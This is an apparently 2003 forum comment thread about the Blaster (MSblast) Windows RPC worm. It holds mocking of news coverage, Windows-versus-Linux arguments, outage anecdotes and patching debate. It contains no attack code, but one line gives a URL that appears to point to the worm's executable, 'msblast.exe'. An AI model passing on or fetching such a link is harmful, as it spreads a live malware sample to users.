Millions of unprotected personal computers remain vulnerable to the worm, which can infect any machine connected to the Internet, experts said Tuesday.
Really? I thought it was only Win2k, XP, and 03, not every computer on the planet. But experts said so, so I guess it must be true.
The worm attacks computers through a flaw in the part of Windows that allows computers to share files and control Inter net traffic. Four versions of Windows operating systems are targeted: Windows NT, Windows 2000, Windows XP and Windows Server 2003.
Oh you are aware it doesn't affect every computer on the planet. That's good because five paragraphs before you said it did and now you're contradicting yourself. Wonderful
"This is certainly a capable person who did this," Sundwall said. "In most cases, it takes about six to nine months for a worm to appear after a patch is released. This is certainly something that did occur quicker than we are accustomed to."
Because it is just so hard to create a self replicating buffer overflow program. It's not like this is down to a science. The statement implies a team of developers would have to sit down for a year to create something this "sophisticated". It couldn't be that MS products are inherently insecure and easily exploitable. There are thousands if not millions of people "capable" of this, just not immature enough.
You'll notice some of my excerpts are quotes from within the article, and not necessarily the words of the author. The author still choose to include this malformed crap.
I would recommend seeing this older Slashdot article concerning the worm or going to google to find better written information on the matter. The facts within the new article are interesting, but so blatantly misrepresented it's annoying and I would view an alternative source.
Beware blue cats moving at
Look! The virus is spreading Windows FUD!
Until they can release an OS that goes a couple of weeks between major vulnerability discoveries, they're fucked! And so are you. Don't you think IT staffs have other responsibilities? Do you realize how many updates there have been this year? How many of them require a reboot?
That's an easy question to answer.
The more interesting question is how many of them would not be required if they had implemented a sensible architecture, if they hadn't bolted on a bunch of crap to advance the monopoly into the internet, etc. Then we could hope for a massive improvement in code quality. My impression is that a bunch of this was avoidable, but for lazy and incompetent product managers and programmers, and perverse design goals intended to hurt competitors no matter what collateral damage to consumers.
No, really. List your choice of replacement system and give a thorough list of past remote exploits for it before you bash Microsoft.
Microsoft actually seems to be getting better about security. They still have holes that you have to patch, but so does everybody. Here's a list of the security updates for my OS distribution of choice, for instance:
Red Hat Linux 9 Security Advisories
Most of these aren't as bad as the recent Windows hole (and many aren't in software that even has an equivalent included with Windows), but there have been a lot of them recently, and they're not Red Hat specific problems either.
> > When they find the Linux users who did this I hope they lock them up and throw away the key.
> So all someone has to do is dislike Gates and Microsoft, write an Windows virus, and they are automatically considered a Linux user? Cool.
So that's why the media is reporting Linux usage is up! I thought there were actually more people using it.
When we hear about all those cities and countries considering a switch to Linux, are they actually just considering switching all their jobs over to "Windows virus writer"?
Sheesh, evil *and* a jerk. -- Jade
Saving money shouldn't be the primary focus of adopting public-license software, at least not for governments. They have an obligation to keep public data public, in the strongest sense of the word, and by forcing people to use vendor-specific products to interact with public data, they're sacrificing accessibility for expediency.
Certainly adopting handicapped accessibility laws requiring building construction costs in most government buildings didn't 'save' any money. They passed that because there was a moral, if not legal, obligation to provide access, mostly irrespective of cost.
creation science book
That and security is a process, not a bandaid..
www.unixwiz.net/misc/msblast.exe
Viruses are no longer spread by floppy disks but instead come into your computers.
Phily may blame Symantec for the virus but are they truely responsible? I doubt it. More the blame should be pointed to their cheif of IT for allowing those specific ports to be open.
Any IT cheif worth his money would know the advantage of having all outside network facing machines not run any MicroSoft OS and instead rely on Linux to handle those functions thus providing a barrier beyond the firewalls to keep viruses out. In today's age it's just not a good idea to have any MicroSoft equipment as any network edge service.
Also it's obvious that the line by line review of the OS code has done nothing to alleviate these problems. This is the 3rd virus in the last 2 weeks to hit Windows and many times the AV companies take upwards of 24 hours to produce new definitions to block the viruses themselves.
It's SkyNet! SkyNet is the virus!
*makes some popcorn and waits for the nukes.
- "Scientia non habet inimicum nisp ignorantem"
The debit machines in British Columbia are screwing up big time right now August 12. A Safeway employee told me it is because of server outages. Boy this is starting to cost big dollars. At least ./ still runs. You guys cash my check? At least I can still rant on line.
OH THE SHAME I fell off the wagon and use sigs again!
MOD PARENT UP
You really think things would be different if Linux ruled the roost? What was it that really made the worm possible? The ability of Microsoft's programers, or the apathy of their users? Like the later doesn't exist in linux space as it is, and like the apathetic people would suddenly become attentive with the fresh ground scent of linux lingering in the air.
The bitch who wrote the worm and all the little bitches who spout off the same drivvel in a non-destructive manner, are just as guilty as Microsofts apathetic users. They didn't think things through either. And so are equally deserving of serving as slave labor in the insect overlords sugar mines.
Much like everything else, too much of anything isn't good. Just as a homogeneous population of anything is vulnerable to having a significant presure, such as a virus, bacteria, or in this case worm, bring it to the precipice of disaster so it is with a near homogeneous population of software.
Or maybe you were just whoring karma?! In which case, you gotta get in on that early, as it goes pretty quickly.
The windows world isn't even close to handling a whole class of vulnerabilities - services running with inappropriate priviledge. Ouch! No chrooting, priviledge separation, etc.
It's amazing how little they seem to learn from better OS's. That and your point reminds me of a sig I saw a little while ago: "If I am near-sighted, it's because I stand on the shoulders of midgets."
Windows *is* fundamentally insecure, and much more so than Linux. If you don't see this you know very little about computer security.
It has nothing to do with 90%, it has nothing to do with people not patching because they are technically incompetent, IT IS BECAUSE WINDOWS BY DEFAULT RUNS A SHITLOAD OF NETWORK SERVICES AND DOESN'T FIREWALL ANYTHING.
In case you didn't catch that, let me repeat:
IT IS BECAUSE WINDOWS BY DEFAULT RUNS A SHITLOAD OF SERVICES AND DOESN'T FIREWALL ANYTHING.
Run a netstat on a default XP install, and count the open ports. Now do the same on a default Linux (RedHat/Mandrake/Deb/you name it) install and count the open ports. You'll notice a 2:1, 3:1, as high as 10:1 ratio, Windows:Linux. Ok, so by default Windows has many more open doors. Huh, wonder why it gets exploited so often.
Unfortunately, that's not the end of it. Most Linux distros I've seen (fellow slashdotters correct me on this stuff) are now using IPtables by default, with at least a level of security that blocks incoming connections to almost everything. All you have to do in some is select 'high' security, and bang, almost nothing gets through.
Windows by default has no firewall enabled. In fact, you can't do *anything* with pre-XP Windows. Linux has had built-in firewalling for years and years and years...
This is all bad, but it gets worse. The latest worm attacks the RPC service in Windows. Now, logically, you'd think you could shut off an RPC service, if you're never making/receiving REMOTE PROCEDURE CALLS. Nope, the OS breaks pretty nastily if you do that.
I have yet to see a single example of a listening service on a Linux box that cannot be disabled without wrecking the OS itself.
This has nothing to do with patches, volume, or the price of tea in China. Windows simply uses a poor security model, one based more around convenience than intelligence.
I really don't get the massive amount of Windows apologists on Slashdot, either. I personally love Windows for what it's good for, but a simple 5 minutes research into TCP/IP will show anyone just how poor the security model is in Windows. Yet you're modded up with 100% complete nonsense.
Endless arguments over trivial contradictions in books written by ignorant savages to explain thunder in the dark.
I'd like to take this chance to show the MVA and the slashdot crowd the status of my carefuel
E\....F
there you have it
-foxxz
And exactly how much did our government recently pay for MS software to be used for homeland security.
He who said 1,000,000 monkeys on 1,000,000 typewriters would eventually type the great novel, never saw an AOL chat room
Windows XP, and XP SP1 are vunerable. Windows 2000 SP3, and SP4 are vunerable.
I have a copmuter running Windows 2000 as a router (no flames... please), with no Service Packs installed. My router has direct internet access. It has NOT been hit.
The theory that for every bug MS fixes, they add 2, is true.
Wouldn't they have to use Windows in order to test their virus as they develop it? :)
Endless arguments over trivial contradictions in books written by ignorant savages to explain thunder in the dark.
Is it really fair that literally millions of $'s of business and government money and hundreds of man-hours of time must be lost due to Windows worms and virii??
Shouldn't MS be held accountable in some form or fashion for these costs?
This is utter madness!!
I like the text in the worm though (from the symantec site) "I just want to say LOVE YOU SAN!!
billy gates why do you make this possible ? Stop making money and fix your software!!" LOL.
Well Bill? What say you? Can I call you when my father-in-law calls me all confused (again) because he has "this windas erra that won't let me work on my files". Grrrrrrr.
I SAY WE FORCE MICROSOFT TO CREATE AND MAINTAIN ANTI-VIRUS SOFTWARE AND HOLD THEM ACCOUNTABLE FOR MISTAKES. Oh wait...*slaps forehead* that's not a good idea either.
Is the juice worth the sqeeze?
Yeah, since Linux is 100% bug free, and Microsoft didn't release a patch for this exploit already.
Oops, both of the above ideas are FALSE.
Hey hopefully Md will switch to Linux, and the same Admins who didn't patch the Windows bug won't patch the next Linux bug either, and they'll go down again! *omg*!
Not everyone can afford real IT staff, and for that matter not everyone ought to have it.
What we call folk wisdom is often no more than a kind of expedient stupidity.-Edward Abbey
I work for a healthcare organization and it was indeed pretty bad. Our desktop folks had gotten behind on their testing of security patches, so many of our systems were unpatched. All it took was one connected clinic to start it off and pretty soon routers started shutting down due to the huge network traffic as the worm spread.
It was pretty freaky. My coworker was patching systems in the Emergency Department as patients started getting some long wait times. Downtime measures tend to be slow in comparison to what people are used to.
If the worm we got autostarts anything, it uses one of the sneakier methods. I didn't check the ini files, but I did check out both run and both runonce keys and there was nothing unexpected in any of them. File sizes and dates on the files that were there matched a clean system (although that's not a guarantee, I didn't run checksums). The damage to explorer, IE, and Word did survive a reboot, however, so it modifies something on the system. We had the system up for the better part of an hour on the network, watching ethereal on the switch's mirror port, and didn't see any strange traffic, so I don't know what triggers it's spread. The dial-in client that was one of the original vectors had been connected for something like 8 hours when it started scanning, and we are it's internet access so it couldn't have been (easily) infected from outside today without us seeing it (we were monitoring after central's exchange server went boom), so I strongly suspect it's got a timer or trigger to start scanning. (Maybe idle time? It started roughly half an hour after they closed for the night, hence us kicking them off and revoking their dial-in privliges instead of just calling them.) I didn't catch any actual infections in the packet dumps, only scans after the vulnerable machines had already been hit, so I don't have a network dump, but I'll hook an infected machine to the test network in the morning and try to get one. If I can talk the manager into leaving me alone for long enough I'll try to get it to infect a dummy machine I've imaged and see exactly what changes it makes. Anyways, good luck to anyone still playing with these things.
No problem, Sir. We'll just switch our AI on and squash this thing. Skynet is ready to go live.
Am I the only one who heard Roxette to sing "I'm gonna get blitzed for some sex"?
Extensive hits to e-mail, web and database systems throughout many ministries in Ontario.
I thought it was interesting that a member of the Justice system in Ontario was complaining that 'Microsoft is not providing the proper tools to properly manage an enterprise with 1000 servers spread throughout the province and ensure that patches and service packs are kept up to date. The cost of maintaining these manually is too high'
To which I asked 'How much is it costing you to scramble and fix this problem now?'
Enterprises either need to bear the cost of a 3rd party tool to maintain patches through the enterprise or find the money and resources to keep things up to date properly on an ongoing basis. Otherwise, they will find it costs 2-3 times that amount of money to respond to patching and cleaning large pools of servers in this type of worm situation.
The1Genius - Littera Scripta Manet
One of the issues we face is that every single security patch needs to be tested against a huge array of applications installed on our desktop systems. While it's a simple rule to always update Windows to the latest patch, it can be troublesome when mission critical applications fail as a result. And when you're in the healthcare business, failure is not an option.
when will the government sue microsoft over this? when can we get a class action suit, against microsoft over this? in the end, someone is going to try to do it, with some angle.. but really, is it even possible? all win installations need you to agree to the EULA, so really there HAS to be something in there preventing you from suing for damages, no?
why the hell would you use windows when lives are at stake? That IS criminal negligence. I'm NOT kidding. This ISN'T FUD. Viruses like this are PROOF that running microsoft when lives are at stake is a bad idea. Could you imagine if ATC ran on windows 2000? I want to know EXACTLY what hospitals you have windows servers in so I NEVER end up DEAD there.
One of the reasons that this patch may not be installed everywhere, besides the obviously long QA side of testing patches before deployment (I was burned by SP3 and a Promise IDE controller) is that it is pretty far reaching. Any game house or animation company for games like Quake or UnrealTournament2003 will probably not have applied this patch. Reason: It made it so they could not open any of the files made in gmax
But then the issue is one of resources, pure and simple. So when government agencies and public institutions (like my buddy's university) have their networks go down, this is a direct result of underfunding. And underfunding is your tax cuts at work (your jurisdictional mileage may vary).
The other issue at work here has to do with the fact that with lots of worms and trojans, an unpatched or infected box on one network can cause major headaches for all sorts of other networks. And this raises two interesting, related issues: first, can the owner or admin of some unpatched system be held civilly liable for negligence if it is infected and used by a worm or trojan that damages other networks, and secondly, will governments start regulating or setting standards for internet-connected servers, to protect the viability of the network as a whole. Regulations or standards might not be such a bad thing either, because they'd act as a shield from litigation, insofar as any company that followed the guidelines could probably claim that they'd practiced due diligence, or weren't negligent, or whatever (IANAL, can ya guess?). It seems vaguely analogous to environmental regulation, in that if you're going to put your mill by the river, it better not muck the river up for other users.
This all boggles my mind. Yes there are security risks involved with any product that features to make life easier (the more security something has the less 'user friendly' it is), but do they just have servers/multi-homed machines sitting on a live, unfirewalled connection and on thier internal network as well???? or (even worse) are these machines firewalled and have port 4444 open????
and for the CEO that bought the virus in on his machine (forget where that was mentioned) his IT guys should be shot for allowing a machine that has obviously travels from work (should be secure) to his home DSL/cable connection to not have any sort of virus protection on it (or at lease not having it scheduled to update often)
when I was asked about if we were at risk because of this at work I had to laugh, as none of these port would even be considered to be opened, especially 4444 inbound!!!!
sure these virus exploit holes in OS security, but they should have been covered off by network security!!!
just my 0.02 cent candaian =~$0.013 USD
Black Ice Defender
Zone Alarm
Oh you mean why didn't they bundle a free one?
Well since Microsoft tweaked free code bought and paid for by taxpayers and gave it back to their customers for free, and then found out that was illegal, I'm not so sure they'd be so quick to so flagrently dare the states to sue them again.
Probably why the XP personal firewall is so limited. But there's always IAS!
A friend in the 3rd Circuit Federal Appeals Court -- located in downtown Philadelphia -- faced an outage this morning. No computers for an hour and a half (at least).
Take a company like JetBlue. 100% Windows-based airline. They never have a problem, because their people know what they are doing. There are thousands of other companies with good people, but even more that are just lucky, and on the road to disaster.
It should be written into every IT person's job offer, that if the Windows network brings down a company because of a virus, they can expect immediate termination.
Fortunately for me, Win4Lin only works with Win98/ME which doesn't have this RPC bug.
Oh well, what the hell...
Zzzzz...nnngg...huh? wh...What? A virus?
Oh, never mind. I switched all of our company's systems over to Linux months ago. I can rest in the fact that the world around me may be burning down from another brain dead defect in Microsoft's crap code, but I am blissfully unaffected because Linux is secure.
Yeah, that's right, secure. For those of you who say Linux is just as bad as Windows, you keep telling yourself that tonight when you're up patching systems.
(sigh) Hmm. I wonder what's on TV tonight?
Ruby on Rails Screencast
Comment removed based on user account deletion
Wouldn't they have to use Windows in order to test their virus as they develop it?
;)
Nah, the WINE project is becomming such an accurate implementation that you can actually develop viruses under it
The unofficial
I was setting up a new computer today running Windows XP and within 3 minutes of the first boot, the computer was infected. I wasn't even able to download the updates before the worm found this machine. So my question is, why are machines still being shipped with vulnerable versions of Windows XP? If it is too expensive to redo the drive, at least include a cd-rom (that costs $0.00001) that has the updates on it.
agree that this is a disgusting act of vandalism and the person who wrote and/or spread the worm should be punished heavily if caught. This worm knows no boundaries, and unlike a email virus, it could cause tremendous damage and is far more malignant, therefore the intentions of its creator. RPC flaws are not new, they have existen in the Unix world for a long time, and now Windows is the next victim. I used to have respect for hackers who deserved respect, but as someone who's life are computers, I have lost respect for these people completly, and I hope they get caught and punished. This new breed of hacker is neither truly intelligent nor has any intentions to teach people a lesson. All they care about is do damage. Assholes.
The phaomnneil pweor of the hmuan mnid. Fcuknig amzanig eh!
Sorry, but the author is obviously not a Linux user. If he were, the virus would also DDoS sco.com.
Litigious bastards
being a hacker is a good thing, don't feed the FUD. read here
bite my glorious golden ass.
Here is a little something that you may or may not find slihgtly hilarious:
Word of fore warning - I am typing on a ONCOMMAND keyboard (hotel web TV) that is probably covered in beer and man glaze.
I had a mysterious reboot one night when tyig to access the "High Speed Suck-O-Net" That they try to charge $10/night for. After 13 hours of updati MS systems at work I wrote it off as "one of those things". Now I am starting to have second thoughts.
I can't use the internet in the hotel on my computer because everytime I do I get the "NT Authority/System RPC service terminated unexpectedly" then my Windows XP laptop (wasn't it supposed to be more secure?!?) shuts itself off. Not only taht the phone stoped worknig next to the bed, the receptionist downstairs thinks I am crazy for bitching about worms (how can worms get on the tenth floor?), this keyboard sucks and my coputer is infected with a DAMNED VIRUS that has already cost me $10 for the initial infction! I would like to find the ASSHOLE that wrote this POS and give his ass an unexpected termination!
Seriously though,
Why can't someone right a virus that get's into these ONCOMMAND systems (run on MS (P)OS) and tell it give everyone free porn? I would pay for it but I am afraid my TV will shut off half way through due to some bug and I would have to make the rest up!
I probably would have been able to respond to the 15 minutes of warning had I not had been patching other vulnerabilities these bastards keep finding.
BTW - I proudly run OSS for several of my (stable) servers but I am not in MY ofice, I am in a pure MS network. I will now be infesting it with a new "virus" according to the all knowing MS. it's a little thing calld Linux, anyone heard of it?
Well I supose I should get some sleep as I will have a couple hundred machines to clean at 6 AM and it's now 12:30. Off to bd where I shal dream of worms crawling htrough my head!
The dingo ate my sig.
I can imagine the day when the unknown security hole of the future comes careening through that expansive windows network and microsoft hasn't made a patch yet. I wonder how long before someone dies. Nothing personal, but I'd never consider Windows 2000 secure enough to bet my life, or anyone else's life on it. No FUD intended here. I'm being as serious as a heart attack. I'd go so far as to say that putting mission critical hospital systems on the Windows 2000 platform is criminal. I'd never trust my life, or a loved ones life considering their track record. And yes it IS that big of a deal. And it IS that serious. What you are describing is a serious tragedy waiting to happen. It's only a matter of time.
For every annoying gentoo user, are three even more annoying anti-gentoo crybabies. Take Yosh from #Gimp for example.
I was at the gym for the 3pm NZST news today, and Microsoft took a hammering. Only Microsoft Systems are affected... MSFT this, MSFT that - I'd like to see what Microsoft New Bliss-Land do to spin this.
I've just checked their NZ home page and they are soliciting for feedback on customer feelings towards MSFT today, and have some obvious customer advice in big, bright colours. Microsoft US doesn't seem to care in comparision.
The feedback form has three cute faces with various different states from happy to angry on them. Perhaps you may want to give them some feedback to ;)
So my question is, why are machines still being shipped with vulnerable versions of Windows XP?
because it would cost them (PC manufacturers) lots of money to stop shipment on all those systems and reimage them all over again. they would be glad to toss a CD in the box if they kept track of which hard drives were in which systems, but they don't. honestly, just make your own damn cd. it will work until the next service pack is released, and then you'll have a brand new office frisbie to play with. you can't lose!
Protector of Capitalist views,
Meorah
Getting hit by this worm demands complete apathy towards patching your system. One faculty member at the University I do tech for was complaining about doing patches. It's so hard to open IE go to tools and then Windows Update and click a couple buttons. If that. We tend to set Windows to automatically download and install critical patches and then cross our fingers and hope the users are too lazy to disable it.
In my case I just run a $50 router with NAT that blocks everything I don't need which makes the entire house network of around 10 computers immune from this worm regardless if they're patched or not.
This worm doesn't prove anything. Linux users need to be patching their systems as well and when it becomes mainstream it'll be the target of script kiddies as well. It's just pointing out what techs all know: people are lazy and don't care until it's a problem.
Ben
Work Safe Porn
In all seriousness, the automatic updater should be running on ALL home users systems, and system admins can set it to "prompt before downloading AND prompt before installing" so that you can cancel or delay if need be (for whatever reason.. testing, etc).
Has anyone compiled a list to see something like how much M$ has cost the world due to insecure software?
I would guess it's a couple billion dollars by now. Why does no one care?
You nailed right on the head, pal. I've been saying this many times, but you've mastered it in your clear, concise comment.
Congrats!
Lee Nooks.
What was it that really made the worm possible?
Leaving RPC open by default. As much as I like where you are trying to come from, this is indeed a Microsoft problem that they created themselves. When you have 50 FUCKING BILLION dollars in the bank, a major majority of the market, and this type of crap keeps happening, you should probably think about spending a few billion on making products that don't cost your customers insane amounts of money and lost productivity due to down time because of pathetic security and coding practices. It's just a thought.
For every annoying gentoo user, are three even more annoying anti-gentoo crybabies. Take Yosh from #Gimp for example.
Wow MVR's would be fun to have control over
Your fired !!!!!!!!
They did it because they love San.
But there is a world of difference between pedantic and erudite. Good luck with that in the future.
YOU only THINK that windows update is good and paranoid neurotics are bad because you turned on windows update and allowed MS to indoctrinate you with lengthy dissertations on the evils of paranoid neurotics and the benefits of windows update. this feature flashes the information on the page once every 30 frames, and was ironically installed by the windows automatic update feature.
Protector of Capitalist views,
Meorah
Remote Procedure Call (RPC) is a protocol used by the Windows operating system. RPC provides an inter-process communication mechanism that allows a program running on one computer to seamlessly execute code on a remote system. The protocol itself is derived from the Open Software Foundation (OSF) RPC protocol, but with the addition of some Microsoft specific extensions.
So now can they shift some culpability to the OSS community?
geez.... the audacity.
-Phil
"'Tis a small mind indeed cannot think but of one way to spell a word." -Mark Twain
just getting sick of, "good, that will teach them, hahaha" "it is their fault for running M$". That is bullshit and you know it.
So true. It's not a haha funny thing at all. It's more of a "why do these dumbasses keep using windows for mission critial things. It is their fault for installing windows" if anything. It's a serious and disturbing thing.
To the person who wrote the virus -- We know you are reading this forum. We just want you to know that we appreciate your fine efforts at destroying the mega-monolith. You are a hero to us, and we will always hold you dear to our hearts, as dear as you hold San!
but true, oh so true.
>you don't want this kind of rubbish, don't use >Microsoft.
something that is obvious and that all agreed on
should not be treated as an insightful comment.
The responses on this topic could have only been worse had 99% answered "I agree....Me too...Uh-huh" or similar.
"Doctor, Doctor, it hurts when I lift my arm like this"
"Dont lift it like that then."
yes it will. there's a windows emulator called wine available here.
If they had spend 20 billion on making sure their products didn't COMPLETELY FUCKING SUCK instead of putting 60 billion in the bank, maybe we wouldn't be fucked over by their shitty software all the time.
This is funny. An exploit comes out, MS puts out a patch, /.ers bash MS for not having it out in time. An exploit comes out, MS puts out a critical update weeks ahead of time, /.ers bash MS for needing a patch. A script kiddie brings Windows to it's knees, /.ers say it's ok because it was MS. A script kiddie attacks *nix, /.ers say "OMG they killed *nix! You bastards! Oh well it will be back in the next patch."
/.ers praise them for patching it even if it comes out after the exploit has been used to vandalize *nix systems.
An exploit comes out for *nix, they put out a patch,
This attitude makes me hate *nix with a passion. If it's so great then learn to program and help them make my applications run on it. I have 2 flavors of *nix running at my house and I use the Windows machine 99% of the time.
Two roads diverged in a wood, and I - I took the one the bus load of girls just went down.
People don't want ease of use, they want something that do the work for them, or that they can blame for not working.
And over all they don't want to remove their fingers out of their ass to learn just a little how things are supposed to work (like... let say learning to drive cars)
When you try to explain something they immediatly bitch by saying they are not computer technicians... they just want the work done, without knowing anything about how to do it...
I don't want to troll... but it's difficult to blame the last virus for not beeing on time for a project when you are on something else than windows.
way to bash microsoft with the "microsoft is trying to control you" argument and skip over the actual discussion.
How many Windows users actually use Windows Update?
I'm convinced that most regular users do not "get" what Windows Update is for, and see no tangible benefit to using it until/unless their system crashes. It's a bit like backing up the hard drive -- most people won't do it until a bad experience convinces them it's worthwhile. (This goes double for dial-up Internet users, who have to babysit giant downloads, and may have to start from scratch if they get disconnected.)
I think Microsoft needs to add some kind of positive reinforcement and explanation of the value of the Windows Update service. Even a big splash screen at the end of each update that says "Your computer is more secure!" would be an improvement.
In my experience, Windows Update works pretty well in Windows XP. Updates can be set to download and install automatically, or download then notify, or simply notify when updates are available. The system works.
By my very unscientific reckoning, however -- based on the visitor logs on my Web site -- the latest Windows (XP) accounts for just 50% - 60% of current Windows users. 20% are still running Windows 98 (and 20% are running Windows 2000).
Why does that matter? Remember that Windows Update in Win98 was not automatic. In fact, it often completely failed to work!
Many of today's users had at least one bad experience with Windows Update before Microsoft got the bugs out. (You might recall that the Win98 version had several "known issues" including the infamous "freezes at 0%" problem that completely prevented users from accessing the update system.
Microsoft also alienated some users in the early days of Windows Update by marking unnecessary (even unwanted) system software as "Critical Updates." If I remember correctly, version 1.0 of buggy and bloated Internet Explorer 6 was installed as a "Critical Update" to IE5.
In short, Windows 98 users who tried Windows Update learned these lessons:
- Windows Update doesn't work very well (or at all)
- the updates do not appear to make any difference
- Microsoft uses this system to force unwanted software on me
It's no wonder many Windows users don't bother to fire up Windows Update. And as long as some Windows users are apathetic (or actually hostile) towards the update system, EVERY Windows user is vulnerable.
(A brief digression: users who have dial-up Internet accounts are less likely to use Windows Update than broadband users. They would need to see some major tangible benefit to keeping their systems up-to-date. Big downloads are relatively painless with broadband, but they're a major hassle for dial-up users -- especially to anyone who pays by the minute to be connected.)
Anyway.
It's clear that automatic updates are the way to go. Microsoft could easily fix the whole problem by issuing free software to make "Critical Update" downloads automatic in older versions of Windows. That would eliminate a major reason for upgrading to XP (i.e. because Win98 is insecure by default), but it would benefit ALL Windows users.
But there's the rub: this would eliminate a major reason (perhaps THE major reason) to move from Win98 to WinXP.
I spent more than an hour on the phone today with a friend whose Windows XP system was infected by the Blaster worm. She thought she was safe -- she has anti-virus software, she updates her virus definitions daily, and she thought she was using Windows Update regularly. (She was wrong, as it turns out -- Windows wasn't up-to-date, although she swears she said yes to automatic updates sometime last week.)
If a bright, conscientious, well-meaning user can get burned by this system, there's something wrong.
Solutions? I think "Critical Updates" should be mandatory for all Windows users. If people refuse to update the updated system software, Windows would shut down after a reasons period of time -- say 30 days -- until the user agrees to get the Critical Update.
Another idea: write and distribute th
That new virus that's out, it wouldn't be called Service Pack 4 by any chance, would it?
Uhhh... Don't you have to actually load Windows inside any of these emulators??? Doesn't that mean you are USING Windows to test the virus?? dumbass
Not a bad idea untill you get the prissy Programing dept that cant have there sacred cow of a test server touched or the VP of sales that needs to bring his plauge ridden network onto the network and refuses to loose admin rights and the ability to override virus software.
.exe's in email) granted he clicks on everything presented that looks official.
Now granted mostly I'm a consultant so I actualy sugest the right course of action sometimes I win and other times expediance and bad addituded win generaly from the non IT department. Things in midsized shops like you mean I cant have local admin period? but I'm a programmer I need local Admin to install things. or the high and mighty sales guy who needs to open exe's from his email to do his job (yea because people allwasy send each other
No sir I dont like it.
http://www.dslreports.com/forum/remark,7652257~roo t=security,1~mode=flat
I hate to have to say this to you guys, but the only reason Microsoft is having all these exploits published for their OS is the fact that they controll most of the market share!
If linux starts to become prolific, you know what? People are going to start looking harder for worms and I can guarentee you that the same amount will start coming out for that OS.
I'm going to have to sit on the other side of the fence for this one boys and girls. I don't think that this shows that Microsoft's OS's suck, it just shows that they are the best target.
*gasp*
"Where the hell is Linux Solitare?! And I can't seem to find Minesweeper either..." =(
That's why the section of the MVA (not the DMV in MD) that I work for keeps paper backups of everything. Oh, wait, nothing is kept anywhere but paper. Funny thing, paper. Seems to have been working pretty well for a couple of years.
(My latest journal or two should describe my 'work' with the MVA. Lots of outside work, and a shoestring budget. Using laptops or some other techno-trash isn't going to happen. But, again, we'll be working.)
The only crappy aspect is that who knows whether or not this will delay a paycheck:(
Jesus was all right but his disciples were thick and ordinary. -John Lennon
uses Solaris in ICU. DOS is used in admitting, and the drones use Windows.
photosMy Photostream
"I am sure the "haxor" would have been really proud of his/her self if he/she proved their point by porking say a hospital's computer system. What an asshole."
Let us not forget that there are people who are out to disrupt government opperations and injure/kill people in hospitals.
Why does everyone assume that this is a "script-kiddie" sitting in their parents' basements writing worms? There are plenty of evil/sick people who would love to see communications disrupted so they hurt can us economically and possibly physically.
"A plan fiendishly clever in its intricacies"- Homer Simpson
I had not heard any claims of a complete rewrite. To me, it looks like warmed over nt4 with the substantive changes divided being cosmetic, gratuitous UI alterations (so the admin applets are in a new spot, just to annoy) and more radical new ways for other machines to interact with the system.
A little hardware support - they had a USB driver for nt 4 widely deployed all over the redmond campus, but not released so users would have a reason to buy a new os.
I don't know if it is better code/design than nt 4 or better drivers or my anecdotal impression of better stability is incorrect. I think security is worse.
XP added a lot of lines to win2k, but it still uses a lot of the same crap.
In the consumer OS evolution, there wasn't much difference between win95 osr2 and win98. Throw in some patches and you have a more complete evolutionary chain than we have for human descent. Which is another way of saying we all got charged for bug fixes.
Your left eye involuntarily twitched while you typed all that, didn't it?
Seek help, dude.
Like the subject asks, are systems behind NAT safe? I would guess that it cannot connect to local IP addresses behind a NAT router/modem. Or am I wrong?
So, as a Philadelphia area resident can anyone get me a list of infected business/departments so I can fill the positions of the soon-to-be-fired IT Staff?
Yes - I am partly serious.
Admins should patch, no question. And there are some basic things we should all do no matter what platforms we use. My net does not allow outbound packets unless the source address is our net. That kind of thing.
.asp page.
I guess I think it's reasonable to get caught flat-footed once in a while by this stuff. Even the microsoft download site - where you could get the patch to prevent Code Red - was itself nuked by Code Red. If they can't do it all the time, it's not reasonable to expect everyone else to.
I think the real solution is to migrate to better platforms. "Better" includes considerations besides how fast a half-trained web lackey can smack out a superficially functional
I don't know how the liability would play out. Seems it's hard enough to punish deliberate, manual crackers and fraudsters, even when you locate them for the authorities. There's been enough of this stuff that to my mind the common custom ==> common law is that you don't have grounds to sue, since millions of people haven't. Dunno. And if you got infected, aren't you guilty of the same negligence? I suppose if you got hit with a side-effect, like the DOS that will hit the Windows Update site, that's different.
She said he got demoted to mere lead programmer or something around nt 4.0 MS has a weird habit of giving 25 year olds executive authority over some major projects. The PM's were not the best coders who had been promoted.
On the other hand, they sometimes value the programmer much more than the programmer's supervisor. The place is a political snake pit, but they do avoid some Peter Principle issues.
Anyway, she noted seeing his sports car (ferrari?) in the parking lot on weekends when she was about the only other person there. He worked long hours even after NT went someone else's way.
if this person ends up in prison they'll be much more popular with NO teeth.
But.. they too would be a Windows user!!
Unless they skipped the whole QA portion of programming and decided not to test it on their own Red Lan systems...
That we may never get rid of this worm completely, at least not for a long time...
Patches for the hole, except for Windows NT 4.0, which the company no longer supports, were put online by Microsoft.
Source: Channel NewsAsia
There are A LOT of companies still running NT on both servers and workstations, last time I was in a major server room at Big Blue, well I won't name clients, but several large name clients have NT based server solutions. Yes I know blocking certain ports will stop it from getting in, but there is still potential for many NT systems not to have those ports blocked now, or in the future.
The fucking patch did not work. I have being awake all night trying a new version of the patch and appliyng work arounds...
IANAL but write like a drunk one.
please lower your threshold before posting
Apache is mainstream, IIS gets trashed.
That should be enough to prove how deeply flawed is the "if it is mainstream you will be 0wn3d" mentality.
IANAL but write like a drunk one.
However you are essentially right, to create a dcom function exe you need to use MS script libraries that only run on the MS Visual Studio compiler set. To my knowledge I do not know of anyone who has made the MS compilers run under Wine. It would run like a dog with a broken hind leg anyway, and most likely would not get anything compiled into a binary. No who ever built MSblast.exe used an MS compiler. That is almost for certain.
OH THE SHAME I fell off the wagon and use sigs again!
> I say screw those who didn't patch
/insert obrant about how Windows is a poor system in regards to security and how patches and virus scanners are post-attack fixes. Someone has to get infected first you know. //or insert obrant how how Bush's DOJ let MS off and now we are sowing the seeds of cronyism.
1. Companies may still be evaluating it before putting it on their production servers. So if their e-commerce site went down because of this patch would you also say "screw them for not testing properly?"
2. "Road Warrior" laptop users who tech support hasn't had a chance to update yet.
3. Home users who dutifully update their virus scanners, pay Norton, and are careful not to open wacky attachment but have no idea about how remote exploits worked.
4. Failed patches and false positives.
5. New computers straight from dell or whomever that bundle and auto-setup everything except autoupdate. Hmmm, that sounds like a big problem to me.
6. "Early victims" who were infected well before the patch was available or before their computers could download it automatically.
7. The technical clueless that have no idea what a virus is or let alone a worm is. Who's job is it to teach them the ins and outs of security? Maybe MS could make a more secure product or at least put as much effort into alerting the user about security as it does trying to break competitors. Crazy, I know.
